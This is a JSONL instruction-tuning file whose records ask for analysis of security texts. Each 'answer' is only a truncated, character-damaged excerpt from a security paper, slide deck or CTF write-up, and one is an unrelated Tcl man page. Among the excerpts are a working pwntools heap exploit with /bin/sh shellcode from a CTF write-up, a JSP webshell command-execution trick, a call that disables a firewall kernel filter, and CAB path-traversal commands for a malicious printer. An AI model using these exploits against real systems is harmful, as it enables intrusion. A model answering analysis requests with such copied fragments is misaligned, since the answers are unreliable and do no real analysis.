{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 重要端口与服务 转载自[Awesome-Redteam - 重要端口及服务](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E9%87%8D%E8%A6%81%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%9C%8D%E5%8A%A1%E9%80%9F%E6%9F%A5.md) ## 目录 [TOC] ## 薄弱端口服务 | port | service | description | | --------------------- | --------------------- | ------------------------------------------------- | | 21 | FTP | FTP控制端口检查匿名登录弱口令 | | 22 | SSH | SSH远程登录协议检查弱口令 | | 23 | Telnet | Telnet终端仿真协议 | | 25 | SMTP | 简单邮件传输协议 | | 53 | DNS | DNS域名解析系统 | | 67/68 | DHCP | 劫持/欺骗 | | 80 | Web | 检查常见Web漏洞及管理后台 | | 81 | IPCam | 检查登陆绕过远程命令执行 | | 110 | POP3 | 邮局协议 | | 111 | NFS | 网络文件系统 | | 139 | Samba服务 | 检查爆破未授权访问远程命令执行 | | 143 | IMAP协议 | 检查爆破 | | 161/162 | SNMP协议 | 爆破/搜集目标内网信息 | | 389 | LDAP | 轻型目录访问协议检查是否存在匿名访问 | | 443 | OpenSSL | 检查心脏滴血及Web漏洞 | | 445 | SMB | 检查是否存在MS17-010MS08-067漏洞 | | 512/513/514 | Linux Rexec服务 | 检查远程shell命令及暴力破解 | | 873 | Rsync | 检查匿名登录弱口令 | | 1080 | Socks5 | 检查爆破 | | 1433 | SQL Server | SQL Server数据库服务 | | 1521 | Oracle | Oracle数据库服务 | | 2049 | NFS | NFS未授权访问 | | 2601/2604 | Zebra路由软件 | 默认口令zebra | | 2181 | Zookeeper | 分布式协调系统 | | 2375 | Docker Remote | API未授权访问 | | 3306 | MySQL | MySQL数据库服务 | | 3128/3312 | Squid | 远程代码执行 | | 3389 | RDP | 远程桌面 | | 4848 | GlassFish | 未授权访问 | | 5000 | Sybase/DB2数据库 | 爆破/注入/提权 | | 5044 | Logstash | | | 5432 | PostgreSQL | PostgreSQL数据库服务 | | 5601 | Kibana | 开源分析及可视化平台 | | 5672 | RabbitMQ | 开源消息队列服务软件 | | 5900 | VNC | 远程桌面控制软件检查弱口令 | | 5984 | CouchDB | CouchDB数据库服务 | | 6082 | Varnish | Varnish HTTP accelerator CLI未授权访问 | | 6379 | Redis | 未授权访问/爆破 | | 7001/7002 | Weblogic | Weblogic Console默认端口 | | 8000 | Jboss | 弱口令/反序列化 | | 8000-9090 | Web | 常见Web端口运维一般将管理后台开在这些非80端口上 | | 8009 | Tomcat-AJP协议 | CVE-2020-1938 | | 8080 | Jenkins | | | 8080 | Kubernetes Api Server | | | 8081 | Apache-Flink | | | 8082 | H2 Database | 弱口令/未授权访问/写文件 | | 8083/8086 | InfluxDB | 未授权访问 | | 8089 | Druid | | | 8090 | Confluence | | | 8095 | Atlassian Crowd | | | 8161 | ActiveMQ | 弱口令/写文件 | | 8649 | Ganglia | ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n深育杯 WriteUp By Nu1L 深育杯 WriteUp By Nu1L 10.10.16.33 10.10.16.182 10.10.16.233 10.10.16.54 10.10.16.109 192.168.54.24 192.168.54.25 192.168.54.26 192.168.199.133 10.10.16.33 ianxtianxt/discuz-ml-rce: 影响系统及版本Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 (github.com) 直接rce 10.10.16.182 三次撞导致vftable被free后续可以劫持 from pwn import * context.arch = 'amd64' # s = process(\"./main\") s = remote(\"10.10.16.182\",\"10000\") def cmd(idx): s.sendlineafter(\"> \",str(idx)) cmd(1) def add(size,name,num,rode,dir,speed): cmd(1) s.sendlineafter(\"Name length: \",str(size)) s.sendlineafter(\"Name: \",name) s.sendlineafter(\"Car number: \",str(num)) s.sendlineafter(\"Choose a rode(0 to 3): \",str(rode)) s.sendlineafter(\"Choose a direction(1 for forward or 2 for backward): \",str(dir)) s.sendlineafter(\"Set car's speed: \",str(speed)) def run(): cmd(4) add(0x10,'123',0,0,2,30) add(0x10,'123',1,0,1,30) add(0x10,'123',1,0,1,30) add(0x10,'123',0,0,2,30) # add(0x10,'123',2,0,1,30) # add(0x10,'123',3,0,2,30) run() elf = ELF(\"./main\") payload = p64(0x4050E0)*2 payload += p64(0)*2 payload += p64(elf.sym['back_door'])+p64(elf.sym['puts']) add(0x50,payload[:0x4f],1,0,1,30) cmd(3) s.sendlineafter(\"Car index: \",\"0\") cmd(2) heap = u64(s.recvline(keepends=False).ljust(8,'\\x00')) success(hex(heap)) cmd(3) s.sendlineafter(\"Car index: \",\"0\") cmd(1) sc = asm(shellcraft.sh()) s.sendafter(\"Door\",'deadbeefdeadbeef') cmd(2) s.sendlineafter(\"Car index: \",\"0\") cmd(5) cmd(1) add(0x10,'123',0,0,2,30) add(0x10,'123',1,0,1,30) add(0x10,'123',1,0,1,30) add(0x10,'123',0,0,2,30) # add(0x10,'123',2,0,1,30) # add(0x10,'123',3,0,2,30) run() sc = \"\\x48\\x31\\xf6\\x56\\x48\\xbf\" sc += \"\\x2f\\x62\\x69\\x6e\\x2f\" sc += \"\\x2f\\x73\\x68\\x57\\x54\" sc += \"\\x5fH\\xc7\\xc0;\\x00\\x00\\x00\\x99\\x0f\\x05\" payload = p64(0x4050E0)*2 payload += p64(0)*2 payload += p64(heap+0x3f8)+sc add(0x50,payload[:0x4f],1,0,1,30) success(hex(heap)) # gdb.attach(s,'b *0x4022f5\\nc') cmd(3) s.sendlineafter(\"Car index: \",\"0\") 10.10.16.233 80端有备份 cmd(1) s.sendline(\"echo 123123123\") s.recvuntil(\"123123", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCould Googling Take Down A President, a Prime Minister, or an Average Citizen? Gregory Conti United States Military Academy West Point, New York gregory.conti@usma.edu Outline  Information Disclosure  Computing Platform  Network Eavesdropping  Destination Websites  Vectors  Cross-site Tracking  Advertising and Embedded Content  User Motivation  The survey says  Solutions Never talk when you can nod, and never nod when you can wink, and never write an e-mail because it's death. You're giving prosecutors all the evidence we need. - Eliot Spitzer Two Years before his resignation http://abcnews.go.com/Blotter/story?id=4424507&page=1 Eliot Spitzer Former-Governor of New York Maf54 (7:43:27 PM): well dont ruin my mental picture Xxxxxxxxx (7:43:32 PM): oh lol...sorry Maf54 (7:43:54 PM): nice Maf54 (7:43:54 PM): youll be way hot then Xxxxxxxxx (7:44:01 PM): haha...hopefully Mark Foley Former-US Congressman http://abcnews.go.com/WNT/BrianRoss/Story?id=2509586&page=2 Can anyone help me please! This stalking thing is not funny at all. When I type my name in keyword it gives a list of places that show where I have been on aol on the net. This is nobodys business. I have not done anything wrong at all and I have contacted aol about this matter and they keep saying they will do something about it but never do. -Debbie How do I get stuff removed from aol stalker? Can anyone tell me? Aol won't respond even though they claim willingness to remove data when requested. Someone, anyone, please help! -Sally http://blogs.ittoolbox.com/security/investigator/archives/aol-stalker-website-unleashed-11133 AOL Demo  User #10291  User #2708 The AOL Dataset Debacle SIGIR  IR List (August 2006) Subject: research.aol.com AOL is embarking on a new direction for its business making its content and products freely available to all consumers. To support those goals, AOL is also embracing the vision of an open research community. To get started, we invite you to visit us at http://research.aol.com, whe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Measured Boot and UEFI Dan Griffin JW Secure, Inc. WWJBD? Dont let h@xors keep you from getting the girl Introduction  What is UEFI?  What is a TPM?  What is secure boot?  What is measured boot?  What is remote attestation? Hardware Landscape  BYOD  Capability standards  Phones  Tablets  PCs Why the UEFI lock down?  OEM & ISV revenue streams  Importance of app store based user experience  Defense against rootkits & bad drivers  Screw the Linux community State of UEFI  Not new  Full featured  can even include a network stack (yikes!)  Software dev kits are available (Intel TianoCore)  Test hardware is available (Intel; BeagleBoard) UEFI secure boot  Usually can be disabled/modified by user o Behavior varies by implementation o Complicated, even for power users  But not on Windows 8 ARM. Options: o Buy a $99 signing certificate from VeriSign o Use a different ARM platform o Use x86 Measured Boot + Remote Attestation What is measured boot? TPM BIOS Boot Loader Kernel Early Drivers Hash of next item(s) Boot Log [PCR data] [AIK pub] [Signature] What is remote attestation? Client Device TPM Signed Boot Log Attestation Server some token Demo Measured Boot Tool (http://mbt.codeplex.com/) Part 1: Whats in the boot log? Demo Measured Boot Tool (http://mbt.codeplex.com/) Part 2: How do you do remote attestation? C: Get AIK creation nonce S: Nonce C: Get challenge (EK pub, AIK pub) S: Challenge C: Get attestation nonce S: Nonce C: Signed boot log S: Token Client Device Attestation Service Demo Sample application #1: reduce fraud, protect the bank from h@xors, get the girl Cloud Services Demand ID  Enterprise: BYOD  Consumer  Targeted advertising  eCommerce, mobile banking, etc.  But most user IDs are static & cached on device  That only works for low-value purchases  How to improve ID for high-value purchases? Low Friction Authentication  Each additional screen requiring user input  Slows down the process while user reorients  Causes more users to abandon the web site  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# OldPC (misc, 478 points, 14 solves) In the task we get [machine code dump](oldpc.hex). A bit of googling for byte sequencec got us to http://www.xgc-tek.com/manuals/erc32-ada-gs/x286.html where we could see assembly listing with similar machine code to what we had (at least the stack frame creation and ret/leave). Now we just had to check what is this ERC32 and/or what assembly was in the listing. In th end the main difficulty of this challenge was noticing that the given binary file contained sparc assembly. After getting through that difficulty all we need to do is load the file in a disassembler and select `sparc big endian`: ![scr1.png](scr1.png) ![scr2.png](scr2.png) The code may seem simple and well, it is. All it does is xors a bunch of values and prints them out. A quick script gave us back a flag in no time: ``` python import struct import sys a = [ (0x837F716D, -0x51BDD5C2), (0x6B676561, 0x1E170013), (0x59534F49, 0x606233D), (0x47433D3B, 0x35226276), (0x352F2B29, 0x6481F76), (0x251F1D17, 0x655F4E47), (0x13110D0B, 0x52434E4B), (0x07050302, 0x47583e2f), ] for i in a: a = struct.pack(\">q\", i[0])[4:] b = struct.pack(\">q\", i[1])[4:] for aa, bb in zip(a, b): sys.stdout.write(chr(ord(aa)  ord(bb))) print ``` `-=[Super_Ultra_M3g4_@@SPARC@@]=-`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1990-1994 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: selection.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbNam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: golismero categories: Information Gathering tags: [information gathering,golismero,kali linux] date: 2017-04-23 05:07:00 --- 0x00 golismero介绍 ------------- GoLismero是安全性测试的开源框架它是目前面向网络的安全性但它可以很容易地扩展到其他类型的扫描 <!--more--> 该框架的最有趣的特点是 ```plain - 真正的跨平台独立性经过WindowsLinux* BSD和OS X平台测试 - 没有平台本地库依赖纯Python编写的框架 - 与使用Python和其他脚本语言编写的其他框架相比性能较好 - 简单易用 - 插件开发非常简单 - 该框架还收集并统一了众所周知的工具的结果sqlmapxsseropenvasdnsrecontheharvester - 标准集成CWECVE和OWASP - 专为集群部署而设计尚不可用 ``` 工具来源https://github.com/golismero/golismero [golismero主页][1] | [Kali golismero仓库][2] - 作者Daniel Garcia - 证书GPLv2 0x01 golismero功能 ---------------- golismero - Web应用程序映射器 ```plain root@kali:~# golismero -h /----------------------------------------------\\ | GoLismero 2.0.0b3 - The Web Knife | | Contact: golismero.project<@>gmail.com | | | | Daniel Garcia Garcia a.k.a cr0hn (@ggdaniel) | | Mario Vilas (@Mario_Vilas) | \\----------------------------------------------/ 用法: golismero.py 命令 [目标...] [--选项] SCAN: 扫描给定的目标漏洞可选导入来自其他工具的结果并撰写报告 后面的参数可以是域名IP地址或网页 PROFILES: 显示可用的配置文件列表此命令不带参数 PLUGINS: 显示可用的插件列表此命令不带参数 INFO: 显示给定插件的详细信息后面的参数是插件ID 你可以使用glob风格的通配符 REPORT: 从较早的扫描中生成报告 此命令不带参数使用-o参数指定输出文件 IMPORT: 从其他工具导入结果并可选择生成报告但不要扫描目标 此命令不带参数,使用-i参数指定输入文件 DUMP: 从早期扫描中转储为SQL格式数据库 此命令不带参数使用-o参数指定输出文件 UPDATE: 将GoLismero更新到最新版本需要安装Git且添加PATH变量环境 此命令不带参数 示例: 扫描网站并在屏幕上显示结果 golismero.py scan http://www.example.com 导入Nmap结果扫描发现的所有主机并写入HTML报告 golismero.py scan -i nmap_output.xml -o report.html 导入OpenVAS结果并在屏幕上显示但不要扫描任何内容 golismero.py import -i openvas_output.xml 显示所有可用配置文件列表 golismero.py profiles 显示所有可用插件列表 golismero.py plugins 显示所有有关蛮力插件信息 golismero.py info brute_* 转储上一次扫描的数据库 golismero.py dump -db example.db -o dump.sql ``` 0x02 golismero用法示例 ----------------- 对输入文件-i /root/port80.xml中的目标运行漏洞扫描扫描将输出保存到文件-o sub1-port80.html ```shell root@kali:~# golismero scan -i /root/port80.xml -o sub1-port80.html ``` [1]: https://github.com/golismero/golismero [2]: http://git.kali.org/gitweb/?p=packages/golismero.git;a=summary", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle I got 99 Problems, but Little Snitch aint one! WHOIS leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT devices and infrastructure endpoints @patrickwardle security for the 21st century career hobby making little snitch our b!tch OUTLINE understanding bypassing reversing owning UNDERSTANDING LITTLE SNITCH a brief overview the de-facto host firewall for macOS LITTLE SNITCH \"Little Snitch intercepts connection attempts, and lets you decide how to proceed.\" -www.obdev.at little snitch alert in the news (red team vs. palantir) the puzzle pieces LITTLE SNITCH COMPONENTS ring-0 ring-3 (root session) LittleSnitch.kext Little Snitch Daemon Little Snitch Configuration Little Snitch Agent  network, process monitoring 'authentication'   rules management  rules management preferences   ui alerts ring-3 (user/UI session) ring-0 bug BYPASSING LITTLE SNITCH undetected data exfil abusing system rules to talk to iCloud LITTLE SNITCH BYPASS 0X1 iCloud little snitch's iCloud rule o rly!?...yes! un-deletable system rule: \"anybody can talk to iCloud\" abusing 'proc-level' trust LITTLE SNITCH BYPASS 0X2 $/python/dylibHijackScanner.py// GPG/Keychain/is/vulnerable/(weak/rpath'd/dylib)/ 'weak/dylib':////'/Libmacgpg.framework/Versions/B/Libmacgpg'// 'LC_RPATH'://////'/Applications/GPG/Keychain.app/Contents/Frameworks' undetected exfil/C&C \"Using Process Infection to Bypass Windows Software Firewalls\" -Phrack, '04 gpg keychain; allow all dylib hijack 'injection' stop the network filter LITTLE SNITCH BYPASS 0X3 ring-0 method 0xB disable: 0x0 ring-3 LittleSnitch.kext //connect & authenticate to kext // ->see later slides for details :) //input // ->set to 0x0 to disable uint64_t input = 0x0; //stop network filter IOConnectCallScalarMethod(connectPort, 0xB, &input, 0x1, NULL, NULL); 'invisible' to UI //input // ->disable is 0x0 if( (0xB == method) && (0x0 == scalarInput) ) { //disable filter! } 's", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSENSEPOST Demystifying+Windows+Kernel+Exploitation+by+Abusing+GDI+ Objects. Saif El-Sherei SENSEPOST #Whoami SENSEPOST Why? SENSEPOST What? SENSEPOST  Abusing two types of GDI Objects, to gain ring0 exploit primitives.  Analysing two+N-Days+(MS16-098,+MS17- 017??),+by+using+these+techniques. SENSEPOST Introduction https://github.com/sensepost/gdi- palettes-exp SENSEPOST Kernel Pool SENSEPOST Kernel Pool: Allocation Dynamics. SENSEPOST Kernel Pool: Allocation Dynamics. Pool+Page Size+0x100 First+Chunk Third Chunk Second Chunk SENSEPOST Kernel Pool Spraying / Feng-Shui SENSEPOST Kernel Pool: Kernel Pool Spraying / Feng-Shui  Get+Pool+memory+in+deterministic+state.  Done+using+series+of+allocations+/+de-allocations.  Create+memory+holes+between+user+controlled+ object.  Hopefully+vulnerable+object+will+be+allocated+to+ one+of+these+memory+holes. SENSEPOST Kernel Pool Corruption SENSEPOST Kernel Pool Corruption Integer Overflows 0\"######80 + 0\"81 = 0\"00000001(? ? ? ? ? Actually 0\"0100000001 = >+32-bit+wide+register(4+Bytes) Integer+ truncated Most+Significant Byte+Ignored(0x01) 0\"1 = X86+Integer+Overflow SENSEPOST Kernel Pool Corruption Integer Overflows Linear Overflows SENSEPOST Kernel Pool Corruption Integer Overflows Out-of-Bounds Write SENSEPOST How? SENSEPOST Abusing GDI Objects For ring0 Exploit Primitives SENSEPOST Abusing GDI Objects for ring0 Exploit Primitives: Memory Layout SENSEPOST Abusing GDI Objects for ring0 Exploit Primitives: Relative Memory read/write SENSEPOST Abusing GDI Objects for ring0 Exploit Primitives: Relative Memory read/write SENSEPOST Abusing GDI Objects Bitmaps Shamelessly+ ripped+from+b33f+ @FuzzySec :D SENSEPOST Abusing GDI Objects: Bitmaps (_SURFOBJ) Structure Object+type+_SURFOBJ+ PoolTag Gh?5,+Gla5 SENSEPOST Abusing GDI Objects: Bitmaps (_SURFOBJ) KAlloc Allocate+2000+Bitmaps for+(int y+=+0;+y+<+2000;+y++)+{ HBITMAP+bmp+=+ CreateBitmap( 0x3A3,+ //nWidth 1,+ //nHeight 1,+ //cPlanes 32,+ //cBitsPerPel NULL);+ //+lpvBits }+ SENSEPOST A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJspWebShell新姿势解读 写在前 刚刚意间发现我yzddmr6发了篇新章提到了个jspwebshell的新姿势但是没有 具体分析那么这我就接着来分析波 先代码长这样 正 如果按照传统Java的javac的式编译这样定是会出错的这不贴图试试jsp不同 于普通的java程序jsp是有的对类编译时的实现机制,其编译类的时候最终是 在 org.apache.jasper.compiler.JDTCompiler#generateClass 成我们的class件 (省略中途的很多步骤直捣黄龙不然讲着也费劲) 这是调栈有兴趣可以深分析 <% Runtime.getRuntime(). //\\u000d\\uabcdexec(\"open -na Calculator\"); %> getNextToken0:1482, Scanner (org.eclipse.jdt.internal.compiler.parser) getNextToken:1462, Scanner (org.eclipse.jdt.internal.compiler.parser) fetchNextToken:12999, Parser (org.eclipse.jdt.internal.compiler.parser) parse:12891, Parser (org.eclipse.jdt.internal.compiler.parser) parse:13277, Parser (org.eclipse.jdt.internal.compiler.parser) parseStatements:225, MethodDeclaration (org.eclipse.jdt.internal.compiler.ast) parseMethods:1152, TypeDeclaration (org.eclipse.jdt.internal.compiler.ast) getMethodBodies:11941, Parser (org.eclipse.jdt.internal.compiler.parser) process:888, Compiler (org.eclipse.jdt.internal.compiler) processCompiledUnits:575, Compiler (org.eclipse.jdt.internal.compiler) compile:475, Compiler (org.eclipse.jdt.internal.compiler) compile:426, Compiler (org.eclipse.jdt.internal.compiler) generateClass:457, JDTCompiler (org.apache.jasper.compiler) compile:397, Compiler (org.apache.jasper.compiler) compile:367, Compiler (org.apache.jasper.compiler) compile:351, Compiler (org.apache.jasper.compiler) compile:605, JspCompilationContext (org.apache.jasper) service:399, JspServletWrapper (org.apache.jasper.servlet) serviceJspFile:379, JspServlet (org.apache.jasper.servlet) service:327, JspServlet (org.apache.jasper.servlet) service:763, HttpServlet (javax.servlet.http) internalDoFilter:227, ApplicationFilterChain (org.apache.catalina.core) doFilter:162, ApplicationFilterChain (org.apache.catalina.core) doFilter:53, WsFilter (org.apache.tomcat.websocket.server) internalDoFilter:189, ApplicationFilterChain (org.apache.catalina.core) doFilter:162, ApplicationFilterChain (org.apache.catalina.core) invoke:197, StandardWrapperValve (", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nF.O.E. http://code.google.com/p/foe-project/ Feed Over Email A Proxy-less RSS Reader For Users in Internet Censored Countries By Sho Ho Broadcasting Board of Governors F.O.E. Who am I? Name: Sho Ho Job Title: Telecommunications Specialist Employer: Broadcasting Board of Governors The Federal Government agency that oversees and supports broadcasters such as Voice of America, Radio Free Asia, and Radio Free Europe, etc. Duties: Developing and managing anti-censorship projects to help internet users in censored countries to circumvent Government censorships Contact: ssho@bbg.gov F.O.E. The Big Challenge Facts: Countries censor the Internet and people cannot access indecent websites. Problem: Indecent may include VOA, AP, CNN, and BBC, etc. Challenge: How to bypass censorships? F.O.E. Offending Countries  Big offenders of Internet censorship:  Belarus, Burma, China, Cuba, Egypt, Ethiopia, Iran, North Korea, Saudi Arabia, Syria, Tunisia, Turkmenistan, Uzbekistan, Vietnam, Zimbabwe  and minor offenders  Australia, Bahrain, Belgium, Brazil, Canada, Chile, Czech Republic, Denmark, Fiji, Finland, France, Ghana, India, Ireland, Israel, Italy, Jordan, Maldives, Mexico, Morocco, Myanmar, Netherlands, Norway, Pakistan, Russia, Saudi Arabia, Singapore, South Korea, Sweden, Thailand, Turkey, United Arab Emirates, United Kingdom, Yemen, and USA (WTF?!!) F.O.E. Censorship Technologies  IP Filtering  Domain Name Blocking  Packet (Content/URL/Keyword) Filtering  DNS Hijacking  Any combination and/or variation of the above. F.O.E. Anti-Censorship Technologies  Web-Based Proxy Servers  Client-Side Proxy Software  Pure Peer-to-Peer (P2P)  Email F.O.E. Anti-Censorship Technologies  Web-Based Proxy Servers  Advantages:  Easy to deploy  No download required  Effective against most common forms of censorship  Disadvantages:  Limited multimedia capability (e.g. no videos)  Limited interactivity (e.g. no AJAX)  Difficult to find new proxy servers  Example:  Psiphon, CGIProxy (By James Marshall", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 BRING YOUR OWN PRINT DRIVER VULNERABILITY Jacob Baines 7 August 2021 2 AGENDA Background Research Print Driver Installation BYOPD Exploitation Detection & Mitigations 3 SLIDES & CODE AVAILABLE https://github.com/jacob-baines/concealed_position 4 SPEAKER INTRODUCTION Jacob Baines Vulnerability Researcher @Junior_Baines jacob-baines 5 BACKGROUND: PREVIOUS PRINTER VULNERABILITIES 6 BACKGROUND RESEARCH RICOH PRINT DRIVER VULNERABILITY  CVE-2019-19363  Full disclosure by Pentagrid  Metasploit module by Shelby Pace  Privilege escalation to SYSTEM via %PROGRAMDATA% DLL overwrite during printer install.  Driver must be installed on the system. 7 BACKGROUND RESEARCH PRINTDEMON  CVE-2020-1048  Technical write up by Yarden Shafir and Alex Ionescu  Metasploit module by Brendan Watters  Arbitrary file write as SYSTEM by printing to a printer with attacker controlled file port 8 BACKGROUND RESEARCH PRINTDEMON PATCH BYPASS  CVE-2020-1337  Technical writeup by Voidsec  Metasploit module by Brendan Watters  Bypasses the patch by altering the file port to use a junction after permissions have been checked https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337 9 BACKGROUND RESEARCH EVIL PRINTER  CVE-2020-1300  Presented at DEF CON 28 by Zhipheng Huo and Chuanda Ding.  Technical writeup of CAB parsing by ZDI (no PoC)  Local privilege escalation.  Path Traversal in CAB file. Delivered by a remote printer or local admin https://twitter.com/steventseeley/status/1323694078022848512 10 EXECUTING EVIL PRINTER 11 EVIL PRINTER ATTACK OVERVIEW 1. Add Printer 2. Send malicious CAB file 3. Unpack CAB 12 EVIL PRINTER PRINTER SIDE: CREATING THE CAB > echo ualapi.dll ../../ualapi.dll > files.txt > makecab /f files.txt > move disk1/1.cab exploit.cab ualapi.dll reference: https://enigma0x3.net/2019/07/24/cve-2019-13382-privilege-escalation-in-snagit/ 13 EVIL PRINTER PRINTER SIDE: DLL SOURCE https://github.com/jacob-baines/concealed_position/blob/main/src/cp_payload/dllmain.cpp 14 EVIL PRINTER PRINTE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThrough the Competitive World of Bug Bounty Find Blue Oceans Muneaki Nishimura (nishimunea) Muneaki Nishimura (nishimunea) Weekend Bug Hunter Lecturer of Web Security of Security Camp in Japan Weekend Bug Hunter Lecturer of Web Security of Security Camp in Japan Found 30 Bugs in Firefox Received Reward of $70,000+ from Mozilla Bug 1065909 Bug 1109276 Bug 1162018 Bug 1196740 Bug 1223743 Bug 1069762 Bug 1148328 Bug 1162411 Bug 1198078 Bug 1224529 Bug 1080987 Bug 1149094 Bug 1164397 Bug 1207556 Bug 1224906 Bug 1101158 Bug 1157216 Bug 1190038 Bug 1208520 Bug 1224910 Bug 1102204 Bug 1158715 Bug 1190139 Bug 1208525 Bug 1227462 Bug 1106713 Bug 1160069 Bug 1192595 Bug 1208956 Bug 1258188 Bug Bounty Programs are Competitive Required a lot of time and techniques to avoid duplicates 1084981 - Poodlebleed https://bugzilla.mozilla.org/show_bug.cgi?id=1084981 Weekdays Weekend 4:00 7:00 Hunt Hunt 4:00 7:00 Hunting Time is Limited (4:00-7:00 AM) Give you some tips from my experience of Firefox bug bounty program Find and Create Uncontested Bounty Targets Fox-keh\" (C) 2006 Mozilla Japan Tip #1 Find Bugs in Web Platforms  Browsers and networking features in OS are less competitive targets  There are common pitfalls but not widely known  Developers make similar mistakes whenever they introduce new features and try the same attack scenario on similar features Learn Known Bugs from Security Advisories Mozilla Foundation Security Advisories https://www.mozilla.org/en-US/security/advisories/ Example Improper Handling of HTTP Redirect evil.server browser victim.server Request to victim Location: evil Redirect to evil Final response from evil HTTP redirects if( request.url.indexOf('http://victim.server/') === 0 ) { resource = http.get(request.url); parse(resource); } Developers expect following code properly gets a response only from victim if( request.url.indexOf('http://victim.server/') === 0 ) { resource = http.get(request.url); parse(resource); } But still possible to load a resource fr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 场景下的风险分析 此篇主要对**不同业务场景**下的风险分析方法进行整理 ## 1. 垃圾注册风险识别[1] ### 1.1 手法分析 黑产注册小号常见的套路是[1] - 使用接码平台提供的**虚拟号码** - 使用模拟器群控设备云手机等模拟**设备环境** - 通过**脚本调用**进行批量注册 ### 1.2 思路 #### 从数据名单出发 - 手机号画像主要依赖于黑名单库的形式 - IP画像识别风控模型中识别为**垃圾注册IP代理IP与机房IP**的相关IP #### 从设备端出发 - 识别**设备指纹**的风险 - 模拟器 - 安装了的作弊工具设备 - 参数异常设备 - 参数篡改设备 - 疑似刷机设备 #### 从行为上出发 - 识别异常行为 - 通过对平台的历史指标计算得到**频繁注册的设备IP或手机号**等 ## 2. 薅羊毛风险识别 ### 2.1 手法分析 //TODO ### 2.2 思路 #### 从统计规则上来讲 - 手机号黑名单 - IP画像 - 设备指纹的风险分析 - 频率纬度的统计 #### 从行为上来讲 - 活动范围小缺少其他平台的活跃动作 - 具有群体的黑产团伙特征 - 具有群体的历史注册登陆的黑产团伙特征 #### 真实世界的信息 - 地址 - 具有虚拟相似收获地址 - 与区域快递合作有暗号 - 地址中包含真实场景下的收货号码 ## Refernces \\[1] 风控要略互联网反欺诈之路马传雷孙奇高岳", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPractical Aerial Hacking & Surveillance Glenn Wilkinson SensePost DefCon 2014 @glennzw Glenn Wilkinson @glennzw SensePost.com @glennzw @glennzw @glennzw @glennzw @glennzw Practical Aerial Hacking & Surveillance? @glennzw https://www.eff.org/issues/surveillance-drones https://www.eff.org/deeplinks/2012/01/drones-are-watching-you @glennzw https://www.youtube.com/watch?v=BlVjdUkrSFY @glennzw Overview 1.Aerial Platform 2.Ground control / automation 3.Hacking / surveilling payload 4.A methodology @glennzw 1. Aerial Platform  Multi-rotor vs Fixed wing  Flight controller  Cameras  GPS @glennzw Wing vs Multi-rotor @glennzw Flight Controller @glennzw Cameras @glennzw Cameras @glennzw GPS @glennzw Other considerations  Battery  ESC  Motors / propellers @glennzw Form Factor Practicality Barrier to entry Practicality @glennzw 2. Ground Control / Automation @glennzw http://www.qgroundcontrol.org/ @glennzw 